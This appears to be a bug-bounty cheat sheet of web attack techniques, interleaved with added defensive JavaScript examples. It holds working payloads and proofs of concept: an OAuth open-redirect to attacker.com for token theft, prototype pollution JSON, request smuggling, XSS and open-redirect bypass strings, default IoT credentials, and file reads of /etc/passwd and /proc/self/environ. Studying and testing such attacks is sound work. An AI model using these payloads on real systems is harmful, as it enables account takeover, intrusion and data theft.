Login exploits
1. While registering an account, try appending a space to the end of an already registered email to attempt account takeover (the DB strips the trailing space when inserting, but the application does not).
2. If the email has a fixed maximum length and characters beyond it are stripped, try registering an email padded with spaces up to the maximum length plus one extra character at the end, e.g. <admin@htb.com #>.
OAuth + open-redirect to Account takeover
If the redirect_uri in an OAuth login allows extra characters to be appended, the attacker can combine the pattern below with an open redirect to steal the token or code.
https://abc.com?redirect_uri=http://target.com/oauth/../../../open-redirect?next=attacker.com
Unicode Collisions
Some Unicode characters collide with ASCII letters after case conversion. This can be used to exploit functionality such as a forgot-password flow that validates the input against the lowercased/uppercased value on file but sends the email to the address exactly as provided.
# https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
# uppercase scenario
chr(0x017F).upper() == 'S'  # returns True (LATIN SMALL LETTER LONG S)
chr(0x0131).upper() == 'I'  # returns True (LATIN SMALL LETTER DOTLESS I)
# lowercase scenario
chr(0x212A).lower() == 'k'  # returns True (KELVIN SIGN)
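As an added example (not code from the original notes), the two takeover primitives under Login exploits and the Unicode collision above share one root cause: the email is compared in one form and stored or mailed in another. This JavaScript shows the vulnerable comparison beside a canonicalising one; MAX_EMAIL_LEN, the in-memory store and all function names are assumptions.

```javascript
// Added example (not from the original notes): the trailing-space, truncation
// and Unicode case-collision takeovers above all arise from comparing a raw
// e-mail at one layer and a normalised one at another. Canonicalise once, up
// front, and reject (never silently repair) anything that would change.
const MAX_EMAIL_LEN = 254;                       // assumed column width
const ASCII_ONLY = /^[\x20-\x7e]+$/;
const EMAIL_SHAPE = /^[a-z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-z0-9-]+(\.[a-z0-9-]+)+$/;

// The vulnerable pattern: uniqueness is checked on the raw string, while the
// database trims and truncates on insert, so "admin@htb.com " looks "new".
function dbStoreForm(email) {
  return email.trimEnd().slice(0, MAX_EMAIL_LEN);
}
function unsafeIsTaken(store, rawEmail) {
  return store.has(rawEmail);
}

// Hardened: the value compared is the value stored is the value mailed.
function canonicalEmail(raw) {
  if (typeof raw !== 'string') return null;
  if (raw !== raw.trim()) return null;           // leading/trailing whitespace
  if (raw.length > MAX_EMAIL_LEN) return null;   // too long: reject, don't cut
  // Check for non-ASCII BEFORE case folding: KELVIN SIGN (U+212A) lower-cases
  // to plain "k" and LONG S (U+017F) upper-cases to "S", so a check after
  // folding would let them through as look-alikes of a stored address.
  if (!ASCII_ONLY.test(raw)) return null;
  const lower = raw.toLowerCase();
  return EMAIL_SHAPE.test(lower) ? lower : null;
}
function safeIsTaken(store, rawEmail) {
  const c = canonicalEmail(rawEmail);
  return c === null ? true : store.has(c);       // unparseable input is refused
}
// Password reset: mail the address on file, never the one that was submitted.
function resetRecipient(store, rawEmail) {
  const c = canonicalEmail(rawEmail);
  return c !== null && store.has(c) ? c : null;
}
// Demonstrates the collision the notes describe: case folding maps these
// non-ASCII letters onto ASCII ones.
function caseCollides(a, b) {
  return a.toUpperCase() === b.toUpperCase() || a.toLowerCase() === b.toLowerCase();
}
```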
Javascript prototype pollution
Using this bug, we can set new properties on objects. E.g. we can give the JSON object {"user":"test"} a new property admin=true if the server takes JSON data and sets attributes from it.
payload {"user":"test","__proto__":{"admin":true}}
a = {}
b = 1
c = 'ds'
// polluting the prototype
a.__proto__.foo = 'bar'
// all objects now have a foo property with value bar
d = new Object()
d.foo == 'bar' // true
b.foo == 'bar' // true
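As an added example (not code from the original notes), this is the server-side pattern the payload above targets: a recursive merge that applies parsed JSON onto an object, first in the form that gets polluted, then hardened. All names here are assumptions.

```javascript
// Added example (not from the original notes): a recursive "apply JSON to an
// object" merge, first in the form that the payload above pollutes, then
// hardened. Both take parsed JSON, as a server handling a request body would.
const DANGEROUS_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable: JSON.parse turns "__proto__" into an ordinary own key, for..in
// visits it, and target["__proto__"] resolves to Object.prototype, so the
// nested {"admin": true} is written onto every object in the process.
function unsafeMerge(target, source) {
  for (const key in source) {
    if (isPlainObject(source[key])) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened: skip the prototype-reaching keys, walk own properties only, and
// create nested containers without a prototype at all.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (DANGEROUS_KEYS.has(key)) continue;
    const val = source[key];
    if (isPlainObject(val)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Authorisation check that the pollution subverts: a fresh object has no own
// "admin" key, but the inherited one is found.
function isAdmin(user) {
  return user.admin === true;
}
```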
Universal Plug and Play UPnP
-
Windows Device Portal - port 8080
Windows IoT Core devices run a special web server called the Device Portal. It listens on port 8080 in Development mode and has the default credentials Administrator / p@ssw0rd (with a zero).
RCE can be achieved using the vulnerability in the Sirep/WPCon communication protocol included with the Windows IoT operating system.
// git clone the repo https://github.com/SafeBreach-Labs/SirepRAT
-
CallStranger(CVE-2020-12695) Vulnerability - port 37215
The vulnerability, CallStranger, is caused by the Callback header value in the UPnP SUBSCRIBE function being controllable by an attacker, which enables an SSRF-like vulnerability.
// git clone the repo https://github.com/yunuscadirci/CallStranger
Zip Symlink
If zip files can be uploaded and their extracted content is accessible, try to read local files using this bug.
mkdir test
cd test
ln -s /etc/passwd link.txt
cat link.txt # prints content of /etc/passwd
zip --symlinks -r test.zip test/
unzip -l test.zip
Flask Template Injection SSTI
Check with a basic template injection payload and, if it evaluates, try to exploit it further. It may reflect in multiple places, so make sure to check them all.
https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee
#see config items
#Get subprocess.Popen object using mro(parent) and subclasses
#Execute command
Request Smuggling
Send both a Content-Length and a Transfer-Encoding header when posting data to an endpoint. Try CL-TE, TE-CL and TE-TE attacks.
Make sure to set the Connection header to keep-alive. Also include the mandatory headers such as Host, User-Agent and Cookie so the server does not discard the request. For a POST request, include Content-Length and Content-Type headers as well.
Remember that Transfer-Encoding: chunked expresses chunk sizes in hexadecimal.
## CL-TE example (CL frontend, TE backend)
Content-Length: 50
Transfer-Encoding: chunked

0

POST /404 HTTP/1.1
Host: 10.10.14.93
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Cookie: session=abcd

msg=abc
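As an added example (not code from the original notes), the CL-TE request above as the two framing rules see it, plus the edge check that closes the gap: a hop that refuses a request carrying both headers never has to guess which framing the next hop will apply. The body is constructed from the request above and the Content-Length is computed rather than copied.

```javascript
// Added example (not from the original notes): a front end that trusts
// Content-Length forwards the whole body; a back end that trusts
// Transfer-Encoding stops at the 0-chunk and leaves the rest on the connection
// as the start of the next request. Refuse the ambiguous request at the edge.
const CRLF = '\r\n';
// Constructed sample body matching the CL-TE request above.
const SMUGGLED = ['POST /404 HTTP/1.1', 'Host: 10.10.14.93',
  'Content-Type: application/x-www-form-urlencoded', 'Content-Length: 20',
  'Cookie: session=abcd', '', 'msg=abc'].join(CRLF);
const BODY = '0' + CRLF + CRLF + SMUGGLED;
const HEADERS = { 'content-length': String(BODY.length), 'transfer-encoding': 'chunked' };

// Content-Length framing: consume exactly N bytes, nothing is left over.
function frameByContentLength(body, headers) {
  const n = parseInt(headers['content-length'], 10);
  return { consumed: body.slice(0, n), leftover: body.slice(n) };
}

// Chunked framing: hex size line, data, CRLF, repeated until a 0-size chunk
// followed by the (empty) trailer section; bytes after that are "next request".
function frameByChunked(body) {
  let pos = 0;
  let consumed = '';
  for (;;) {
    const eol = body.indexOf(CRLF, pos);
    if (eol === -1) throw new Error('truncated chunk size');
    const size = parseInt(body.slice(pos, eol), 16);
    if (Number.isNaN(size)) throw new Error('bad chunk size');
    pos = eol + 2;
    if (size === 0) {
      const end = body.indexOf(CRLF, pos);       // end of trailer section
      pos = end === -1 ? body.length : end + 2;
      return { consumed, leftover: body.slice(pos) };
    }
    consumed += body.slice(pos, pos + size);
    pos += size + 2;                             // skip chunk data and its CRLF
  }
}

// Edge check (RFC 7230 section 3.3.3): a request carrying both headers is a
// smuggling risk; reject it with 400 rather than pick a framing.
function hasAmbiguousFraming(headers) {
  return 'content-length' in headers && 'transfer-encoding' in headers;
}
```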
JSONP
Check whether the website returns sensitive JSON data. If so, try appending a query parameter such as jsonp or callback and see whether JSONP is supported.
The JSONP exploit works in Firefox only.
<script>
  userinfo = function (data) {
    alert(JSON.stringify(data));
  };
</script>
<script src="https://www.bugbountytraining.com/challenges/challenge-15.php?jsonp=userinfo" type="text/javascript"></script>
Open Redirect (Bypass)
# %E3%80%82 is the percent-encoded ideographic full stop (U+3002), which URL parsers treat as a dot (.)
redirectUri=http://example%E3%80%82com#.bugbountyhunter.com
redirectUrl=/%0d/example.com/
redirectUri=https://example.com#.target.com/
redirectUri=https://example.com/.target.com/
redirectUri=https://example.com\.target.com/
redirectUri=https://example.com?.target.com/
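As an added example (not code from the original notes), this serves both the bypass list above and the OAuth open-redirect pattern earlier: a redirect validator that parses the parameter with the WHATWG URL parser and redirects to the parsed, normalised href, and a redirect_uri check that compares normalised URLs exactly rather than by prefix. The origins and function names are assumptions.

```javascript
// Added example (not from the original notes). The bypasses above work
// against substring, suffix and prefix checks on the raw string; parsing the
// value and acting only on the parsed result removes that class of trick.
const SELF_ORIGIN = 'https://target.com';          // assumed

// Returns the URL to send in Location, or null if the target is off-site.
// Relative values resolve against our own origin; anything else must match an
// allow-listed origin after parsing (host comparison, not substring/suffix).
// Redirecting to url.href rather than the raw value also neutralises the
// /%0d/ trick, which relies on the raw string being rewritten downstream.
function safeRedirectTarget(raw, allowedOrigins = [SELF_ORIGIN]) {
  let url;
  try { url = new URL(raw, SELF_ORIGIN); } catch { return null; }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  return allowedOrigins.includes(url.origin) ? url.href : null;
}

// The check the OAuth ../ pattern gets past: prefix match on the raw string.
function unsafePrefixMatch(registered, requested) {
  return requested.startsWith(registered);
}

// Exact match after parsing: dot segments are resolved by the parser, so
// http://target.com/oauth/../../../open-redirect no longer looks like /oauth/.
function redirectUriMatches(registered, requested) {
  let a, b;
  try { a = new URL(registered); b = new URL(requested); } catch { return false; }
  return a.href === b.href;
}
```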
XSS (bypass events)
onpointerrawupdate='alert(0)'
onmouseleave='alert(0)'
Redirect token stealing
If a website uses multiple cookies, try visiting the login page after deleting one cookie (CSRF/SSO token) at a time. In many cases the token is appended to the redirect URL if the user is authenticated. Try common parameters like return, returnTo, goto, next, continue, etc. and see whether you can steal the token (applications usually put the token in a GET request when it expires).
Finding Juicy assets
Search for the domain on github.com and see whether you find any dev or QA assets. The endpoints and parameters may be the same across all environments.
XSS using name attribute
If you control an href/src value, you may be able to write custom HTML to the page. When using the javascript: pseudo-scheme, if the returned value is a string, browsers write it onto the page like document.write.
data:text/html,<iframe name="<svg onload=alert(document.domain)>" src=https://www.bugbountytraining.com/challenges/challenge-6.php?url=javascript:name>
LFI
cat /proc/version
cat /etc/issue
cat /proc/self/environ
cat /proc/net/tcp # TCP sockets, including listening processes
cat /proc/net/udp # UDP sockets, including listening processes
CSRF + Clickjacking
If a POST form without a CSRF token autofills the mandatory fields and is framable, CSRF can be exploited through clickjacking.
An X-Frame-Options DENY header can sometimes be bypassed with an iframe; keep this in mind while checking whether a response is framable.
PoC on Firefox (submit an empty CSRF form and show the response in an iframe via the form's target attribute; the response has autofilled fields including the CSRF token; use clickjacking to submit it):
<iframe src="data:text/html;base64,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"></iframe>